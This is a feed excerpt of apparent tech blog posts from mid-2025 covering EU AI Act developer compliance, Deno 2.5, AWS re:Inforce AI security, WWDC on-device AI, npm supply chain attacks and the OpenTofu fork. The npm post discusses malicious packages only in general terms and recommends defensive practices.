models, you need to document both the foundation model\u0026rsquo;s characteristics and your fine-tuning process.\nData governance: Training data must be \u0026ldquo;relevant, representative, free of errors, and complete.\u0026rdquo; In practice, this means implementing data lineage tracking, bias auditing, and quality assurance processes for your training pipelines. If you\u0026rsquo;re using synthetic data, you need to document how it was generated and verify it doesn\u0026rsquo;t introduce systematic biases.\nLogging and monitoring: High-risk systems must maintain logs of their operation, with enough detail to enable post-hoc analysis of decisions. This has real architectural implications — you need to design your inference pipeline to capture inputs, outputs, confidence scores, and any intermediate reasoning steps in a way that\u0026rsquo;s auditable and tamper-resistant.\nHuman oversight: There must be mechanisms for human oversight, including the ability to override or halt the AI system. This means building admin interfaces, kill switches, and escalation pathways into your application architecture from the start, not bolting them on later.\nWhat This Means for Your Architecture # If I were designing a high-risk AI system today with EU AI Act compliance in mind, my architecture would look different from what most teams build. Here\u0026rsquo;s what I\u0026rsquo;d prioritize:\nObservability-first design: Every inference call gets logged with full context. I\u0026rsquo;d use OpenTelemetry to instrument the entire pipeline, from data ingestion through preprocessing, inference, and post-processing. These logs need to be immutable and retained for the periods specified in the Act.\nModel versioning and reproducibility: Every model version must be traceable back to its training data and configuration. Tools like MLflow or DVC aren\u0026rsquo;t optional luxuries — they\u0026rsquo;re compliance necessities. You need to be able to recreate any model version that was ever in production.\nBias testing as CI/CD: Fairness and bias evaluations should run as part of your continuous integration pipeline, not as quarterly manual reviews. Define your fairness metrics, write automated tests, and fail the build if they regress. This is the same principle we apply to performance testing — make it automated and continuous. AI-assisted testing approaches can help automate fairness validation workflows.\nCircuit breakers and human-in-the-loop: Design your system with the assumption that a human will sometimes need to intervene. That means building queuing systems for uncertain predictions, alerting for anomalous patterns, and administrative interfaces for review and override.\nThe General-Purpose AI Angle # For teams using foundation models through APIs — calling GPT, Claude, Gemini, or similar services — the Act places specific obligations on the providers of these \u0026ldquo;general-purpose AI models.\u0026rdquo; Providers must supply technical documentation, comply with copyright rules, and publish summaries of training data. Teams should understand general-purpose AI compliance obligations to properly allocate responsibility between provider and deployer.\nBut that doesn\u0026rsquo;t absolve you as the deployer. If you build a high-risk application on top of a general-purpose model, you\u0026rsquo;re still responsible for the application-level compliance requirements. The foundation model provider handles their obligations; you handle yours. Understanding this boundary is crucial for your compliance strategy. For teams building AI agents with autonomous capabilities, the compliance burden becomes even more complex — agents that take actions on your behalf require even stronger governance frameworks.\nSub-Hub: AI Regulation \u0026amp; Compliance Frameworks # For broader exploration of how regulation is shaping AI development, including GPAI compliance, agent governance, and building responsible systems by design, see AI Regulation \u0026amp; Compliance Frameworks — Building Responsible AI Systems. This sub-hub connects AI Act requirements to practical implementation patterns.\nMy Take # I\u0026rsquo;ll be honest: regulation often makes me nervous as a developer. Bureaucratic requirements can slow down innovation and create compliance theater that doesn\u0026rsquo;t actually improve outcomes. But having studied the AI Act in detail, I think the technical requirements are largely reasonable. Documentation, testing, monitoring, and human oversight aren\u0026rsquo;t bureaucratic overhead — they\u0026rsquo;re good engineering practices that too many AI teams skip in the rush to ship.\nThe teams that will struggle most are those that have been treating AI development like a prototyping exercise: minimal documentation, no version control for data or models, no systematic bias testing. The AI Act is essentially mandating the engineering rigor that should have been there all along. This discipline applies across the board — from AI-powered development tools that need transparency and auditability to backend inference systems. As AI agents become more autonomous, the compliance implications only deepen.\nMy advice: don\u0026rsquo;t wait for enforcement actions to start taking this seriously. Begin by auditing your existing AI systems against the risk categories. If anything falls into high-risk territory, start implementing the technical controls now. AI compliance needs to be architected from the beginning, not retrofitted. The compliance deadline will arrive faster than you think, and retrofitting compliance into an existing system is always more expensive than building it in from the start.\nTeams should also consider how security and supply chain best practices complement EU AI Act compliance — many of the same principles around auditability, reproducibility, and verification apply to both.\nThis is one of those areas where the developer landscape is shifting beneath our feet, and proactive preparation beats reactive scrambling every time. The broader AI governance landscape will be shaped by how teams navigate these compliance requirements. Compliance will increasingly be baked into development tooling and practices rather than left as an afterthought.\n","date":"3 July 2025","externalUrl":null,"permalink":"/posts/250703-eu-ai-act-developer-compliance/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"With key EU AI Act provisions now in effect, development teams building AI systems need to understand the practical implications for their architectures and workflows.","title":"The EU AI Act Compliance Clock Is Ticking — What Developers Need to Know","type":"posts"},{"content":"Deno dropped version 2.5 this week, and while it might not have generated the same headlines as the original Deno 1.0 launch, this release represents something more important: the maturing of the JavaScript runtime ecosystem into a genuine multi-player market. After decades of Node.js being the only game in town, we now have three serious contenders — and developers are the ones winning.\nWhat\u0026rsquo;s New in Deno 2.5 # The headline features center around improved Node.js compatibility and better monorepo support. Deno\u0026rsquo;s node: compatibility layer now covers over 95% of the Node.js standard library, which means most npm packages work without modification. The new workspace configuration options make it practical to use Deno in larger codebases that follow the monorepo pattern.\nBut the feature that caught my eye is the improved deno compile output. The ability to compile a Deno application into a single, self-contained binary has been available for a while, but the 2.5 release significantly reduces binary sizes and improves startup times. For those of us deploying JavaScript to edge environments or building CLI tools, this is a meaningful improvement.\nThe deno fmt and deno lint tools also received updates, with better support for the latest ECMAScript proposals and improved TypeScript handling. These built-in tools remain one of Deno\u0026rsquo;s strongest selling points — no more cobbling together ESLint, Prettier, and a dozen config files just to have a consistent development experience. This aligns with the broader trend toward unified tooling we\u0026rsquo;re seeing across programming ecosystems. This mirrors a broader trend toward developer tooling that prioritizes ergonomics.\nThe Three-Runtime Reality # We\u0026rsquo;re now firmly in a world where Node.js, Deno, and Bun are all viable choices for JavaScript server-side development. This mirrors the broader JavaScript runtime landscape and Bun\u0026rsquo;s Rust rewrite that show how the ecosystem is maturing. Each has carved out its own identity:\nNode.js remains the established choice with the largest ecosystem. The recent Node.js 22 LTS release is solid, and the runtime continues to modernize with better ESM support and the experimental permission model. If you\u0026rsquo;re building something that needs maximum library compatibility and you want the safest hiring choice, Node.js is still the answer.\nDeno positions itself as the \u0026ldquo;correct by default\u0026rdquo; option. Security permissions, TypeScript support, and built-in tooling out of the box. With the 2.x series focusing heavily on Node.js compatibility, Deno is increasingly viable for teams that want those developer experience benefits without sacrificing access to the npm ecosystem.\nBun is the performance-focused contender. Its bundler, test runner, and package manager are fast — genuinely, noticeably fast. For development workflows where iteration speed matters, Bun\u0026rsquo;s sub-second installs and hot reloading make a real difference. The focus on systems-level performance and broader developer tooling consolidation around speed-first approaches is becoming a defining characteristic of the newer JavaScript runtimes.\nWhat This Competition Means for Developers # I\u0026rsquo;ve been writing server-side JavaScript since the early Node.js days, back when we were all arguing about callback hell and whether promises were the answer. (They were, mostly.) What\u0026rsquo;s happening now with the runtime competition is something I haven\u0026rsquo;t seen before in the JavaScript ecosystem: genuine innovation driven by competition at the platform level.\nConsider what we\u0026rsquo;ve gained in the last two years:\nBuilt-in TypeScript support (Deno, Bun, and now experimentally in Node.js) Native test runners in all three runtimes Permission-based security models Single-binary compilation Dramatically faster package installation These aren\u0026rsquo;t incremental improvements. They\u0026rsquo;re fundamental upgrades to the developer experience that would have taken much longer to materialize in a single-runtime world.\nPractical Considerations for Teams # If you\u0026rsquo;re leading a development team and wondering whether to stick with Node.js or explore alternatives, here\u0026rsquo;s my pragmatic take: it depends on your situation, and that\u0026rsquo;s not a cop-out answer.\nFor new greenfield projects with a small, adaptable team, Deno 2.5 is genuinely worth evaluating. The built-in tooling reduces your dependency footprint, the security model is sensible, and the Node.js compatibility means you\u0026rsquo;re not cut off from the npm ecosystem. Smaller dependency trees reduce your supply chain attack surface.\nFor existing Node.js codebases, the migration cost usually isn\u0026rsquo;t justified unless you\u0026rsquo;re hitting specific pain points that Deno or Bun solve. The JavaScript runtime is rarely the bottleneck in most applications — it\u0026rsquo;s usually database queries, network calls, or architectural decisions.\nFor edge and serverless deployments, Deno\u0026rsquo;s compile target and Bun\u0026rsquo;s startup performance make them compelling choices. When cold start times directly impact user experience and cost, the runtime choice matters more than in traditional server deployments.\nMy Take # I\u0026rsquo;ve been experimenting with Deno for side projects since the 2.0 release, and 2.5 feels like the version where it truly becomes a practical choice for production work. The Node.js compatibility story is good enough now that I\u0026rsquo;m not constantly hitting import errors or missing APIs.\nBut here\u0026rsquo;s what I think matters most: the competition itself. Node.js has improved faster in the last two years than in the preceding five, and that\u0026rsquo;s not a coincidence. This mirrors how AI system competition is driving innovation across the ecosystem, where multiple contenders push everyone toward better solutions. Ryan Dahl creating Deno and Jarred Sumner creating Bun didn\u0026rsquo;t just give us alternative runtimes — they gave the Node.js team motivation to ship features faster.\nWhatever runtime you choose, we\u0026rsquo;re in a better place than we were three years ago. The JavaScript server ecosystem is healthier for having genuine competition, and this week\u0026rsquo;s Deno release is another data point in that trend.\nIf you\u0026rsquo;re curious, I\u0026rsquo;d suggest spending a weekend porting a small project to Deno 2.5. You might be surprised at how smooth the experience has become.\n","date":"26 June 2025","externalUrl":null,"permalink":"/posts/250626-deno-25-javascript-runtime-wars/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Deno 2.5 brings improved Node.js compatibility and workspace support, signaling that the JavaScript runtime competition is driving real innovation.","title":"Deno 2.5 and the Maturing JavaScript Runtime Wars","type":"posts"},{"content":"AWS re:Inforce wrapped up this week in Philadelphia, and if there\u0026rsquo;s one theme that dominated the event, it\u0026rsquo;s this: securing AI workloads is no longer a niche concern — it\u0026rsquo;s the main event. After years of cloud security conferences focused on misconfigured S3 buckets and overly permissive IAM roles, we\u0026rsquo;re seeing a genuine shift in what \u0026ldquo;cloud security\u0026rdquo; means.\nThe AI Security Problem Space # What struck me most about the announcements was how AWS is acknowledging that AI workloads create fundamentally different security challenges. Traditional cloud security operates on well-understood primitives: who can access what resource, what network paths exist, what data is at rest versus in transit. AI workloads blur all of these boundaries. These concerns intersect with regulatory requirements like the EU AI Act compliance obligations that security teams must now navigate. These concerns intersect directly with regulatory requirements like the EU AI Act compliance obligations that security teams now have to navigate.\nWhen you\u0026rsquo;re running inference endpoints, your model weights are intellectual property that need protection. When you\u0026rsquo;re fine-tuning on customer data, you need isolation guarantees that go beyond standard VPC configurations. When you\u0026rsquo;re building RAG pipelines with foundation models, you\u0026rsquo;re creating new data flows that existing monitoring tools weren\u0026rsquo;t designed to track.\nAWS\u0026rsquo;s new Amazon Bedrock Guardrails enhancements address some of this. The ability to define content filtering policies, PII detection, and topic restrictions at the infrastructure level — rather than relying on application-layer implementations — is a meaningful improvement. I\u0026rsquo;ve seen too many teams cobble together prompt filtering with regex patterns and hope for the best.\nIdentity and Access for the Model Era # The expanded IAM controls for SageMaker and Bedrock are worth paying attention to. AWS introduced more granular permissions for model access, allowing organizations to control not just who can invoke a model, but which models they can invoke, with what parameters, and using what data sources.\nThis matters more than it might seem. In practice, I\u0026rsquo;ve worked with teams where developers had broad SageMaker permissions because \u0026ldquo;they need to experiment.\u0026rdquo; That\u0026rsquo;s fine until someone accidentally fine-tunes a foundation model on production customer data without proper data handling agreements in place. The new permission boundaries let you maintain developer velocity while putting guardrails (the organizational kind, not the Bedrock kind) around sensitive operations.\nThe integration with AWS Organizations and Service Control Policies means you can enforce these boundaries across an entire enterprise. For those of us managing multi-account AWS environments, this is a welcome addition to the policy toolkit.\nData Protection Gets Contextual # The announcement I found most interesting was the expansion of Amazon Macie to understand AI data flows. Macie has been solid for scanning S3 buckets for sensitive data, but the new capabilities extend that awareness to data moving through AI pipelines.\nThink about a typical RAG architecture: documents get ingested, chunked, embedded, and stored in a vector database. At each stage, sensitive data could be exposed in new ways. An embedding of a document containing PII is itself a form of that PII — it can potentially be reverse-engineered or used to infer the original content. Traditional DLP tools have no concept of this.\nHaving infrastructure-level visibility into these flows isn\u0026rsquo;t just a compliance checkbox. It\u0026rsquo;s a practical necessity for any organization dealing with regulated data that also wants to leverage AI capabilities. And that\u0026rsquo;s basically every enterprise I work with these days.\nThe Shared Responsibility Model, Revised # AWS also updated their shared responsibility model documentation to explicitly address AI workloads. This might sound like a minor documentation change, but it matters. The original shared responsibility model was elegantly simple: AWS secures the infrastructure, you secure what you put on it. With AI, the lines are blurrier.\nWho\u0026rsquo;s responsible for bias in a foundation model you access through Bedrock? What about prompt injection vulnerabilities in your application? What about data leakage through model outputs? The updated guidance provides clearer delineation, and while it predictably places most of the application-layer responsibility on customers, it at least gives security teams a framework for thinking about these questions.\nMy Take # I\u0026rsquo;ve been attending AWS security events since re:Invent started having dedicated security tracks, and this year\u0026rsquo;s re:Inforce felt like a genuine inflection point. The security industry has spent the last year hand-wringing about AI risks while mostly selling repackaged products with \u0026ldquo;AI\u0026rdquo; slapped on the marketing page. This parallels how broader platform security and compliance challenges require foundational infrastructure investments. AWS, to their credit, is building actual infrastructure-level security primitives. The same rigor that applies to supply chain security and systematic security practices should apply to AI infrastructure.\nThat said, I remain cautiously skeptical about how quickly organizations will adopt these tools. In my experience, security tooling adoption lags capability announcements by 18-24 months. Most teams are still catching up on basic cloud security hygiene — properly implementing least-privilege IAM, enabling CloudTrail everywhere, actually reading their GuardDuty findings.\nThe organizations that will benefit most from these AI security features are the ones that already have mature cloud security programs. For everyone else, these announcements are a useful signal of where the industry is headed, even if the immediate priority should still be locking down that public S3 bucket from 2019.\nCloud security continues to evolve, and this week reminded me that staying current isn\u0026rsquo;t optional — it\u0026rsquo;s table stakes.\n","date":"19 June 2025","externalUrl":null,"permalink":"/posts/250619-aws-reinforce-2025-ai-security/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"AWS re:Inforce 2025 puts AI workload security front and center, with new guardrails, identity controls, and data protection features that signal where cloud security is headed.","title":"AWS re:Inforce 2025 — Cloud Security Gets Serious About AI Workloads","type":"posts"},{"content":"Apple\u0026rsquo;s Worldwide Developers Conference kicked off this week in Cupertino, and while the consumer features will dominate the headlines, the developer implications of this year\u0026rsquo;s announcements are worth unpacking. Apple\u0026rsquo;s bet is becoming clearer with each passing year: while the rest of the industry races to build bigger cloud-hosted models, Apple is investing heavily in making AI capabilities run locally on device. As a developer who\u0026rsquo;s been building for Apple platforms on and off for over two decades, I find this both strategically brilliant and technically fascinating.\nApple Intelligence Gets Foundational APIs # Last year\u0026rsquo;s introduction of Apple Intelligence felt tentative — a set of user-facing features (writing tools, image generation, notification summaries) that developers couldn\u0026rsquo;t directly tap into. This year, Apple opened the floodgates. The new Foundation Models framework gives developers direct access to the on-device language model, with APIs for text generation, summarization, entity extraction, and semantic search.\nThe API design is classic Apple: opinionated, constrained, and focused on making the common case easy. You don\u0026rsquo;t get to fine-tune the model or adjust temperature parameters. Instead, you describe your task using structured schemas, and the framework handles model selection and optimization. It\u0026rsquo;s the opposite of the \u0026ldquo;here\u0026rsquo;s a raw model endpoint, good luck\u0026rdquo; approach that cloud-hosted foundation models typically offer.\nWhat impressed me most was the performance. The demos showed sub-second response times for tasks like document summarization and code explanation, running entirely on the Neural Engine without network connectivity. For applications where latency matters — and that\u0026rsquo;s most applications — this is a significant advantage over cloud-based alternatives. Small models optimized for edge deployment are becoming increasingly important.\nXcode Gets Smarter # The Xcode updates deserve attention. Apple has clearly been watching what AI-native IDEs like Cursor and GitHub Copilot are doing, and this year\u0026rsquo;s Xcode includes significantly upgraded AI assistance. Code completion is now powered by a larger on-device model that understands SwiftUI patterns and API conventions deeply. The new \u0026ldquo;Intelligent Refactoring\u0026rdquo; feature can restructure code across files while maintaining architectural consistency.\nBut the standout feature is the enhanced debugging assistant. Point it at a crash log or a failing test, and it provides not just explanations but suggested fixes with full context awareness. I\u0026rsquo;ve been using the beta for a few days, and while it\u0026rsquo;s not perfect, it\u0026rsquo;s caught issues that would have taken me significantly longer to track down manually.\nThe interesting constraint is that all of this runs locally. Apple isn\u0026rsquo;t sending your code to the cloud for analysis — a stance that resonates with enterprise developers who have legitimate concerns about code confidentiality. Whether Apple\u0026rsquo;s on-device models can match the capability of cloud-hosted alternatives is an open question, but for many development tasks, they\u0026rsquo;re already good enough.\nSwift and SwiftUI Evolution # Swift 6.2 brings several language improvements that developers have been requesting. Enhanced concurrency support makes structured concurrency patterns more ergonomic — the async/await story in Swift has improved dramatically over the past few versions, though it\u0026rsquo;s still more verbose than I\u0026rsquo;d like compared to Kotlin\u0026rsquo;s coroutines.\nSwiftUI continues its march toward feature parity with UIKit. The new layout system improvements and custom container APIs address some of the framework\u0026rsquo;s most persistent pain points. For the first time, I\u0026rsquo;d feel comfortable recommending SwiftUI as the primary UI framework for a complex production app without significant caveats. That\u0026rsquo;s a milestone worth noting.\nThe new Swift Testing framework is also maturing nicely. The macro-based approach to test declarations feels more natural than XCTest\u0026rsquo;s class-based model, and the integration with Xcode\u0026rsquo;s test navigator is seamless. Small quality-of-life improvements like this compound over time to make the development experience genuinely better.\nThe Privacy Angle # Apple\u0026rsquo;s commitment to on-device processing is partly a technical bet and partly a business strategy rooted in privacy as a differentiator. In a world where every AI interaction potentially sends sensitive data to a cloud provider, Apple\u0026rsquo;s approach offers a compelling alternative: AI capabilities with no data leaving the device. This aligns with broader privacy-first regulations like the EU AI Act. This privacy-first approach also aligns with emerging regulatory requirements like the EU AI Act, which emphasizes data minimization and user protection.\nThis has real implications for regulated industries. Healthcare apps that need AI features but can\u0026rsquo;t send patient data to third-party servers. Financial applications subject to data residency requirements. Enterprise tools handling confidential business information. For these use cases, on-device AI isn\u0026rsquo;t just a nice-to-have — it\u0026rsquo;s a requirement.\nThe tradeoff is capability. Apple\u0026rsquo;s on-device models are impressive for their size, but they can\u0026rsquo;t match the raw power of GPT-4 or Claude running on data center hardware. Apple\u0026rsquo;s answer is the hybrid approach introduced last year with Private Cloud Compute — when a task exceeds on-device capabilities, it can be routed to Apple\u0026rsquo;s secure cloud infrastructure, processed without Apple retaining the data, and results returned to the device. This year\u0026rsquo;s updates make this handoff more seamless and extend it to developer APIs.\nvisionOS and Spatial Computing # The visionOS 3 updates were less revolutionary than I expected. Apple is clearly still in the \u0026ldquo;build the foundation\u0026rdquo; phase for spatial computing. The improved hand tracking and eye tracking APIs are welcome, and the new collaboration features for shared spatial experiences open interesting possibilities. But the killer app for Vision Pro remains elusive.\nWhat I did find interesting was the convergence of AI and spatial computing. The new scene understanding APIs use on-device machine learning to identify objects and surfaces in the user\u0026rsquo;s environment with much higher fidelity than before. For augmented reality applications — which I still believe will be more impactful than fully immersive VR — this is important groundwork.\nMy Take # WWDC 2025 confirms Apple\u0026rsquo;s strategic direction: build the best on-device AI platform and let privacy be the differentiator. It\u0026rsquo;s a bet that requires continuous advances in model compression, hardware optimization, and silicon design — areas where Apple has demonstrated consistent excellence.\nFor developers, the message is clear: start building with on-device AI capabilities now. The Foundation Models framework lowers the barrier to entry significantly, and the performance characteristics make it viable for production applications. This contrasts with the broader ecosystem of cloud-hosted AI assistants that remain important for more complex tasks. If you\u0026rsquo;ve been waiting for Apple\u0026rsquo;s AI story to mature before investing in it, the wait is over.\nMy main concern is ecosystem fragmentation. Building for Apple\u0026rsquo;s AI APIs means building for Apple\u0026rsquo;s platforms only. The code won\u0026rsquo;t port to Android or the web. For cross-platform teams, this creates yet another platform-specific layer to manage. Apple has never been particularly concerned about cross-platform compatibility, and that\u0026rsquo;s unlikely to change.\nStill, for teams committed to the Apple ecosystem, this year\u0026rsquo;s WWDC delivered the tools and frameworks needed to build genuinely intelligent applications. The on-device approach may not be the loudest strategy in the AI race, but it might be the most sustainable.\n","date":"12 June 2025","externalUrl":null,"permalink":"/posts/250612-wwdc-2025-on-device-ai/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Apple’s WWDC 2025 reveals a clear strategy: make on-device AI the foundation of the platform, with major implications for developers.","title":"WWDC 2025 — Apple Doubles Down on On-Device AI","type":"posts"},{"content":"If you\u0026rsquo;ve been following security news this spring, you\u0026rsquo;ve seen the reports: another batch of malicious packages discovered on npm, another round of typosquatting attacks targeting popular libraries, another reminder that the JavaScript ecosystem\u0026rsquo;s greatest strength — its vast package registry — is also its most persistent vulnerability. This pattern echoes earlier major attacks and the broader supply chain security landscape that the industry continues to struggle with. As someone who\u0026rsquo;s been building Node.js applications since the early days, I find myself oscillating between frustration that we haven\u0026rsquo;t solved this and grudging acknowledgment that the problem is genuinely hard. This isn\u0026rsquo;t a new concern either — the npm ecosystem has faced supply chain challenges since GitHub\u0026rsquo;s acquisition.\nThe Latest Wave # The recent incidents follow a depressingly familiar pattern. Attackers publish packages with names similar to popular libraries — think react-dev-toolkit instead of legitimate development tools, or lodash-utils-v2 mimicking the ubiquitous utility library. These packages contain obfuscated code that exfiltrates environment variables, SSH keys, or cryptocurrency wallet credentials when installed.\nWhat\u0026rsquo;s changed in 2025 is the sophistication. Earlier typosquatting attacks were often crude — obvious obfuscation, immediate payload execution, easily detected by even basic security scanning. The latest generation is sneakier. Payloads that only activate in CI/CD environments. Code that waits days before phoning home. Packages that actually provide the functionality they claim to offer while silently siphoning data in the background. The attackers are learning from our defenses.\nThe numbers are sobering. npm hosts over 3 million packages. The registry sees millions of downloads per day. The npm security team and community researchers do heroic work identifying and removing malicious packages, but it\u0026rsquo;s an asymmetric fight — defenders need to catch everything; attackers only need one package to slip through.\nWhy JavaScript Is Uniquely Vulnerable # Every package ecosystem faces supply chain risks, but npm\u0026rsquo;s exposure is disproportionate for several structural reasons.\nDependency depth. The JavaScript ecosystem\u0026rsquo;s culture of small, single-purpose packages means that a typical Node.js project has hundreds or thousands of transitive dependencies. Each one is a potential attack vector. I just checked one of my production APIs — 847 packages in node_modules for what is, by any standard, a modest Express application. Every one of those packages is code I\u0026rsquo;m trusting to run in my production environment.\nInstall-time code execution. npm\u0026rsquo;s preinstall and postinstall scripts can execute arbitrary code the moment you run npm install. This is useful for native module compilation but catastrophic from a security perspective. The package doesn\u0026rsquo;t even need to be imported in your application code — installing it is enough to trigger the payload.\nNamespace squatting. Unlike some registries, npm doesn\u0026rsquo;t have strong namespace governance. Anyone can publish totally-legit-package-name and hope that someone typos their way into installing it. The scoped packages (@org/package) help, but most of the ecosystem\u0026rsquo;s popular packages predate scopes.\nRapid adoption culture. JavaScript developers are culturally inclined to reach for a package rather than implement functionality themselves. This isn\u0026rsquo;t inherently wrong — reuse is a core engineering principle — but it creates a trust surface that\u0026rsquo;s enormous and largely unverified.\nWhat\u0026rsquo;s Actually Being Done # Credit where it\u0026rsquo;s due: the ecosystem isn\u0026rsquo;t standing still. npm (now part of GitHub) has rolled out several security improvements over the past year.\nSocket has emerged as a significant player in the supply chain security space, offering real-time analysis of package behavior rather than just known vulnerability matching. Their approach — monitoring what packages actually do at install time and runtime — catches the kind of novel attacks that CVE databases miss.\nnpm\u0026rsquo;s provenance attestations, based on Sigstore, are gaining adoption. These align with broader supply chain security standards like SLSA, which provide frameworks for build integrity. They allow package maintainers to cryptographically prove that a published package was built from a specific commit in a specific repository. It doesn\u0026rsquo;t prevent all attacks, but it makes certain categories — compromised maintainer accounts, build system tampering — significantly harder.\nThe npm audit command continues to improve, and tools like Snyk and Dependabot help teams stay on top of known vulnerabilities. But these tools are largely reactive — they catch known-bad packages after they\u0026rsquo;ve been identified, not before they\u0026rsquo;ve been installed. Learning from xz Utils aftermath shows why proactive detection and architectural changes matter more than post-incident response.\nPractical Steps for Your Team # After years of dealing with this, here\u0026rsquo;s my pragmatic checklist for Node.js projects:\nUse lockfiles religiously. package-lock.json ensures reproducible installs and prevents silent dependency updates. Never deploy without one.\nAudit install scripts. Run npm install --ignore-scripts by default and explicitly whitelist packages that need install scripts. Yes, this breaks some workflows. That\u0026rsquo;s a feature, not a bug.\nPin dependencies. Use exact versions in package.json rather than semver ranges. The convenience of automatic minor updates isn\u0026rsquo;t worth the security risk.\nReview new dependencies. Before adding a package, check its download counts, maintenance activity, and — if possible — skim the source code. This doesn\u0026rsquo;t scale perfectly, but it catches the obvious stuff.\nMonitor with purpose. Use Socket, Snyk, or similar tools in your CI pipeline. Block deploys that introduce packages with suspicious behavior patterns.\nMinimize dependency depth. Sometimes the right answer is to write the 20 lines of code yourself instead of pulling in a package that brings 15 transitive dependencies. This principle also applies to Python tooling consolidation, where simpler dependency graphs are preferable to comprehensive tool ecosystems.\nMy Take # The npm supply chain problem is ultimately a governance and incentive problem. The registry is open by design — anyone can publish anything — and the cost of publishing malicious packages is near zero while the potential payoff is significant. Until that equation changes, we\u0026rsquo;re playing defense. Implementing SLSA frameworks and zero-day awareness helps shift the balance, and organizations deploying AI systems must consider these supply chain risks as part of EU AI Act compliance.\nI don\u0026rsquo;t think the answer is a closed registry or mandatory code review for every package — that would kill the innovation that makes the JavaScript ecosystem vibrant. But I do think we need better defaults. Disabling install scripts by default. Requiring provenance attestations for packages above a certain download threshold. Making dependency review a first-class part of the development workflow rather than an afterthought.\nThe JavaScript community has solved harder problems than this. But it requires acknowledging that the current state of affairs — where any developer can accidentally install malware by mistyping a package name — is not acceptable for an ecosystem that powers a significant portion of the world\u0026rsquo;s web infrastructure.\nLock your dependencies. Audit your packages. Stay vigilant. And maybe, just maybe, write that utility function yourself.\n","date":"5 June 2025","externalUrl":null,"permalink":"/posts/250605-npm-supply-chain-security-lessons/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Another wave of malicious npm packages reminds us that JavaScript’s dependency ecosystem remains one of software’s biggest security challenges.","title":"NPM Supply Chain Attacks — The Problem That Won't Go Away","type":"posts"},{"content":"When HashiCorp switched Terraform\u0026rsquo;s license from MPL to BSL in August 2023, the infrastructure-as-code community erupted. Within weeks, the OpenTofu project was announced under the Linux Foundation, promising to maintain a truly open-source alternative. This parallels broader cloud platform and DevOps evolution trends. Nearly two years in, I think it\u0026rsquo;s time to take an honest look at how that fork is going — because the answer is more nuanced than either cheerleaders or skeptics predicted.\nThe State of OpenTofu in Mid-2025 # OpenTofu has shipped several significant releases since its 1.6 GA launch in January 2024. The project has established a steady release cadence, an active contributor community, and — critically — broad support from the ecosystem of providers and modules that make Terraform/OpenTofu actually useful.\nThe headline feature that\u0026rsquo;s gotten the most attention is state encryption, which was one of the first major divergences from upstream Terraform. This is a genuine improvement — storing infrastructure state in plaintext has always been a security concern that the community complained about for years. OpenTofu tackled it head-on, and the implementation is solid. Client-side encryption of state files with support for multiple key providers (AWS KMS, GCP KMS, OpenBao) addresses a real pain point.\nOther additions include improved variable validation, early support for for_each on provider configurations, and various performance improvements to the planning engine. None of these are revolutionary on their own, but together they signal a project that\u0026rsquo;s doing the unglamorous work of improving developer experience incrementally.\nProvider Ecosystem Health # This was always going to be the make-or-break question for OpenTofu. Terraform\u0026rsquo;s value was never just the core engine — it was the vast ecosystem of providers that let you manage everything from AWS VPCs to Datadog monitors. If providers didn\u0026rsquo;t work with OpenTofu, the fork would be dead on arrival.\nThe good news: compatibility has been remarkably high. The major cloud providers (AWS, Azure, GCP) work without issues. Most community providers have adopted dual compatibility. The OpenTofu registry is growing, and the team has done a good job of maintaining backward compatibility with Terraform configurations.\nThe nuance: some HashiCorp-authored providers are starting to diverge in ways that create friction. Nothing breaking yet, but the gap is widening. Teams considering a migration need to test their specific provider configurations rather than assuming everything will \u0026ldquo;just work.\u0026rdquo; I\u0026rsquo;ve been advising teams to set up parallel planning runs during migration — run both terraform plan and tofu plan and diff the outputs before committing. This approach aligns well with container-based infrastructure strategies using tools like Docker for reproducible deployment pipelines, while supply chain security and cloud cost implications should also factor into migration decisions.\nWho\u0026rsquo;s Actually Migrating? # In my conversations with DevOps teams across Europe, the migration pattern is interesting. New projects are increasingly starting with OpenTofu — the license clarity makes procurement and legal conversations much simpler, especially in organizations that have policies about BSL-licensed software. For greenfield work, there\u0026rsquo;s really no downside.\nExisting Terraform users are more cautious, and reasonably so. Migration is technically straightforward (swap the binary, update CI configurations), but the organizational change management is non-trivial. Teams need to update documentation, retrain muscle memory on CLI differences, and — most importantly — decide whether to pin to OpenTofu or maintain the option to switch back.\nThe enterprises I\u0026rsquo;ve seen commit to OpenTofu tend to have strong opinions about open-source licensing and/or have been burned by vendor lock-in before. The ones staying with Terraform tend to be HashiCorp customers who value the commercial support and Terraform Cloud integration. Both are rational choices.\nThe Broader IaC Landscape # OpenTofu\u0026rsquo;s emergence has energized the broader infrastructure-as-code space in unexpected ways. Pulumi continues to gain traction with its programming-language-first approach — writing infrastructure in Python, TypeScript, or Go rather than HCL appeals to developers who\u0026rsquo;d rather not learn another DSL. AWS CDK occupies a similar space for AWS-only shops.\nThen there\u0026rsquo;s the new generation of tools like System Initiative that are rethinking infrastructure management from scratch, with collaborative visual interfaces and reactive change engines. It\u0026rsquo;s early days, but the innovation in this space is encouraging.\nWhat I find most healthy about the current landscape is that teams actually have choices now. Two years ago, if you wanted declarative multi-cloud infrastructure management, Terraform was essentially the only game in town. Today, you have OpenTofu for the open-source path, Terraform for the commercial path, Pulumi for the programming-language path, and emerging alternatives for teams willing to be on the cutting edge.\nMy Take # OpenTofu has exceeded my expectations. I wasn\u0026rsquo;t sure a community fork could maintain the velocity and quality needed to be a credible Terraform alternative, but the project has proven it can. The governance is transparent, the release quality has been high, and the contributor base is diverse enough to be sustainable.\nThat said, I worry about the long-term divergence challenge. As OpenTofu and Terraform evolve independently, the \u0026ldquo;easy migration\u0026rdquo; story will eventually break down. Teams will need to commit to one or the other, and that commitment gets harder to reverse over time. If you\u0026rsquo;re making this decision now, think carefully about your organization\u0026rsquo;s values around open-source licensing, your need for commercial support, and your tolerance for ecosystem risk.\nFor what it\u0026rsquo;s worth, my personal infrastructure projects have all moved to OpenTofu. The state encryption alone was worth the switch, and I sleep better knowing my tooling can\u0026rsquo;t have its license changed out from under me. But I\u0026rsquo;m not dogmatic about it — the right choice depends on your context. As organizations focus on cost optimization and engineering ownership, tooling that isn\u0026rsquo;t vendor-locked becomes increasingly valuable.\nThe Terraform fork was a test of whether the open-source community could effectively respond to a licensing change by a major vendor. So far, the answer is a cautious but genuine yes.\n","date":"29 May 